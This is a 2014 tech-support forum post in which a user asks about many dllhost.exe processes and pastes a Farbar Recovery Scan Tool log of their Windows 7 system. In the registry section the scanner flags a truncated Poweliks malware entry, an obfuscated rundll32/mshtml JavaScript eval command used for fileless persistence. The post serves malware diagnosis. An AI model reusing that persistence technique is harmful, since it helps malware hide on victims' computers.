Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Too many DLLHOST.exe *32 running


  • This topic is locked This topic is locked
20 replies to this topic

#1 litepc

litepc

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 07:52 AM

Hi there:

 

All of a sudden i see too many dllhost.exe *32 running and i dont know why,

can one please help me fix this problem? and also any idea why this is happening?

 

please note that i have ESET nod 32 version 6.0.316.0 running on my pc.

 

Thank you,

 

Emanuel

 

ps: i included in here the 2  FRST files.

 

-------------------------------------------------------------------------------------

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 31-08-2014 02
Ran by FD-2 (administrator) on SFTFD-2 on 01-09-2014 08:39:01
Running from C:\Users\FD-2\Downloads
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Amadeus) C:\Program Files (x86)\Automatic Update\AutoUpdate.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe
() C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe
() C:\ICVERIFY\ICWin420\Jcard\JCardService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
() C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Intuit Inc.) C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBW32.EXE
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_comm_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_system_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
(Microsoft Corporation) C:\Windows\System32\wiawow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Sun Microsystems, Inc.) C:\ICVERIFY\ICWin420\jre1.6.0\bin\javaw.exe
(ICVERIFY, Inc.) C:\ICVERIFY\ICWin420\ICVTnsServer.exe
(FirstData) C:\ICVERIFY\ICWin420\Firstdata.Security.PCVXFileMonitor.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_host_service.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Farbar) C:\Users\FD-2\Downloads\FRST64(2).exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [6330568 2013-03-21] (ESET)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_winlogonx64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1305414874-3063939017-1416520829-1002\...\MountPoints2: {592239f5-783d-11e3-9df9-a41f727f797e} - E:\LG_PC_Programs.exe
HKU\S-1-5-21-1305414874-3063939017-1416520829-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnk
ShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnk
ShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBW32.EXE (Intuit Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - DefaultScope {3E55D4B1-86FD-4BD7-A10D-13927F39D929} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {3E55D4B1-86FD-4BD7-A10D-13927F39D929} URL = https://www.google.com/search?q={searchTerms}
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/_layouts/ClientBin/ieawsdc32.cab
DPF: HKLM-x32 {051FE707-9706-11D5-A836-000102A7C938} http://certificates.amadeusvista.com/sgwadmin/common/AutoUpdateATL43P100.CAB
DPF: HKLM-x32 {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} http://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: HKLM-x32 {5CCB8990-66EF-4466-B051-CD27FA3821DF} http://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: HKLM-x32 {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} http://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
DPF: HKLM-x32 {F96020DD-C373-44A0-82B6-064EF0AEEAE3} http://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
Handler: intu-help-qb7 - {5A03BD9D-766D-47A6-8E87-CD90F60BE245} -  No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} -  No File
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: intu-help-qb7 - {5A03BD9D-766D-47A6-8E87-CD90F60BE245} - C:\Program Files (x86)\Intuit1\QuickBooks 2014\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\SYSTEM\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation)
Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} -  No File
Tcpip\Parameters: [DhcpNameServer] 208.67.222.222 208.67.220.220 4.2.2.2

FireFox:
========
FF ProfilePath: C:\Users\FD-2\AppData\Roaming\Mozilla\Firefox\Profiles\31sv5obh.default
FF Homepage: hxxp://google.com/
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\PROGRAM FILES (X86)\FOXIT SOFTWARE\FOXIT READER\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\FD-2\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-08-20]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird

Chrome:
=======
CHR Profile: C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-08-08]
CHR Extension: (Google Drive) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-08-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-25]
CHR Extension: (YouTube) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-08-08]
CHR Extension: (Google Search) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-08-08]
CHR Extension: (Google Wallet) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-25]
CHR Extension: (Gmail) - C:\Users\FD-2\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-08-08]
CHR Extension: (example) - C:\Users\FD-2\AppData\Roaming\2433510085 [2014-08-08]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 Amadeus Automatic Update; C:\Program Files (x86)\Automatic Update\AutoUpdate.exe [228192 2014-04-04] (Amadeus)
S2 CLKMSVC10_9EC60124; C:\Program Files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [248304 2011-08-11] (CyberLink)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1341664 2013-03-21] (ESET)
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe [610888 2014-07-31] (Citrix Online, a division of Citrix Systems, Inc.)
S3 icvmlt32; C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe [55152 2012-04-09] ()
R2 ICVTnsServer; C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe [55152 2012-04-09] ()
R2 JCard Service; C:\ICVERIFY\ICWin420\Jcard\JCardService.exe [149360 2012-04-09] ()
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 PCVXFileMonitor; C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe [55152 2012-04-09] ()
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2014-06-26] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [65536 2014-06-26] (Intuit Inc.) [File not signed]
R2 QBVSS; C:\Program Files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2014-06-26] (Intuit Inc.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [213416 2013-02-20] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [150616 2013-01-10] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [139768 2013-01-10] (ESET)
S3 EtronSTOR; C:\Windows\System32\Drivers\EtronSTOR.sys [32512 2012-06-13] (Etron Technology Inc)
R3 PaniniUSB; C:\Windows\System32\DRIVERS\PaniniUSB.sys [266752 2012-10-22] (Jungo)
R3 PaniniUSB; C:\Windows\SysWOW64\DRIVERS\PaniniUSB.sys [266752 2012-10-22] (Jungo)
S2 PMEM; C:\Windows\SysWOW64\drivers\pmemnt.sys [7168 1999-03-08] (Microsoft Corporation) [File not signed]
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-08-10] (Corel Corporation)
S3 SNXPPAMD; C:\Windows\system32\drivers\snxppamd.sys [100728 2010-12-03] (SUNIX Co., Ltd.)
S3 SNXPSAMD; C:\Windows\system32\drivers\snxpsamd.sys [97144 2010-12-03] (SUNIX Co., Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-01 08:38 - 2014-09-01 08:38 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(2).exe
2014-09-01 02:13 - 2014-09-01 02:13 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64(1).exe
2014-09-01 02:10 - 2014-09-01 02:11 - 05161948 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool(1).exe.part
2014-09-01 02:09 - 2014-09-01 02:09 - 05162600 _____ (ParetoLogic, Inc.) C:\Users\FD-2\Downloads\Repair-tool.exe
2014-09-01 01:22 - 2014-09-01 01:20 - 03219456 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dgl.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 03219456 _____ (VMware, Inc.) C:\Windows\system32\vm3dgl.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00602112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstime.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00602112 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00217088 _____ (VMware, Inc.) C:\Windows\SysWOW64\vm3dum.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00217088 _____ (VMware, Inc.) C:\Windows\system32\vm3dum.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00061440 _____ (VMware, Inc.) C:\Windows\SysWOW64\vsocklib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00061440 _____ (VMware, Inc.) C:\Windows\system32\vsocklib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00053248 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00053248 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLib.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00049152 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmhgfs.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00049152 _____ (VMware, Inc.) C:\Windows\system32\vmhgfs.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00032768 _____ (VMware, Inc.) C:\Windows\SysWOW64\vmGuestLibJava.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00032768 _____ (VMware, Inc.) C:\Windows\system32\vmGuestLibJava.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00016384 _____ () C:\Windows\SysWOW64\corpol.dll
2014-09-01 01:22 - 2014-09-01 01:20 - 00016384 _____ () C:\Windows\system32\corpol.dll
2014-09-01 01:07 - 2014-09-01 01:07 - 00001091 _____ () C:\Users\FD-2\Desktop\DllTool.lnk
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DllTool
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\Users\FD-2\AppData\Roaming\KSafe
2014-09-01 01:07 - 2014-09-01 01:07 - 00000000 ____D () C:\ProgramData\KSafe
2014-09-01 01:06 - 2014-09-01 01:06 - 08473440 _____ ( ) C:\Users\FD-2\Downloads\DllTool.exe
2014-09-01 01:06 - 2014-09-01 01:06 - 00000000 ____D () C:\Program Files (x86)\DllTool
2014-09-01 00:57 - 2014-09-01 00:57 - 00037443 _____ () C:\Users\FD-2\Downloads\Addition.txt
2014-09-01 00:55 - 2014-09-01 08:39 - 00017658 _____ () C:\Users\FD-2\Downloads\FRST.txt
2014-09-01 00:55 - 2014-09-01 08:39 - 00000000 ____D () C:\FRST
2014-09-01 00:55 - 2014-09-01 00:55 - 02104832 _____ (Farbar) C:\Users\FD-2\Downloads\FRST64.exe
2014-08-27 23:55 - 2014-08-22 22:07 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-27 23:55 - 2014-08-22 21:45 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-08-27 23:55 - 2014-08-22 20:59 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-27 01:15 - 2014-08-27 01:15 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-08-25 13:37 - 2014-08-25 13:38 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-08-16 03:00 - 2014-06-30 18:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-16 03:00 - 2014-06-30 18:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-08-16 03:00 - 2014-06-06 02:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-08-16 03:00 - 2014-06-06 02:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-16 03:00 - 2014-03-09 17:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-16 03:00 - 2014-03-09 17:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-16 03:00 - 2014-03-09 17:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-08-16 03:00 - 2014-03-09 17:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-08-15 23:55 - 2014-08-06 22:06 - 00529920 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-08-15 23:55 - 2014-08-06 22:01 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-08-15 23:55 - 2014-07-24 15:28 - 17861120 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-15 23:55 - 2014-07-24 15:12 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-15 23:55 - 2014-07-24 15:10 - 10920960 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-15 23:55 - 2014-07-24 15:07 - 01384960 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-15 23:55 - 2014-07-24 15:06 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-15 23:55 - 2014-07-24 15:05 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-15 23:55 - 2014-07-24 15:05 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-08-15 23:55 - 2014-07-24 15:05 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 02155520 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-15 23:55 - 2014-07-24 15:04 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-15 23:55 - 2014-07-24 15:03 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-15 23:55 - 2014-07-24 15:03 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-15 23:55 - 2014-07-24 15:03 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-15 23:55 - 2014-07-24 15:03 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-08-15 23:55 - 2014-07-24 15:03 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-08-15 23:55 - 2014-07-24 15:03 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-08-15 23:55 - 2014-07-24 15:02 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-15 23:55 - 2014-07-24 14:07 - 12356608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-08-15 23:55 - 2014-07-24 13:58 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-15 23:55 - 2014-07-24 13:57 - 09739264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-15 23:55 - 2014-07-24 13:52 - 01137664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-15 23:55 - 2014-07-24 13:51 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-15 23:55 - 2014-07-24 13:51 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-15 23:55 - 2014-07-24 13:50 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
